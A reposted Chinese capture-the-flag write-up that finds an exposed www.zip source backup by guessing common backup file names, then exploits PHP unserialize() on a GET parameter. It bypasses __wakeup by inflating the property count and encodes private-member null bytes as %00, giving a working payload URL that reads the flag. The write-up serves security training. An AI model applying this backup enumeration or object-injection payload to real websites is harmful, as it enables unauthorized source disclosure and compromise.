进入网页,根据提示,估计网站存在备份文件存在任意下载漏洞
尝试获取源码
常见的网站源码备份文件后缀
.rar/.zip/.7z/.tar/.tar.gz/.bak/.swp/.txt/.html/
常见的网站源码备份文件名
web/website/backup/back/www/wwwroot/temp
经过尝试www.zip为该备份,未删除或设置权限,可进行下载操作。
tip:也可以尝试使用御剑和disearch进行扫描
打开压缩包,得到网站源码
分析源码
源码核心为2部分
- index.php
- class.php
-------非重点内容-----------
--------------------------
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
-------非重点内容-----------
--------------------------
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
考察点清晰:反序列化。
思路:利用反序列化对私有变量进行更改,以使析构函数满足条件,输出flag。
关键点:
- 构造能对构造函数利用的Name序列化对象
- 绕过
__wakeup - 对Name序列化私有变量做特殊处理
解题
构造序列化
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name(admin,100);
echo serialize($a);
echo urlencode('');
// O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
// O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
?>
将变量数改为3,即可导致wakeup无法执行,直接跳过。
private变量前带有空格,需要将空字符改为%00,防止被url编码错误编码为空格。
Payload
xx/index.php?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
补充
在序列化对象中,
public变量名前无特殊标识,private中包含空字符[空字符],protected中包含[空字符]*[空字符]
%00Huihe%00name %00为不可打印字符,即空字符
%00%2A%00age %2A 为 *
转载:https://blog.csdn.net/DARKNOTES/article/details/114767341
查看评论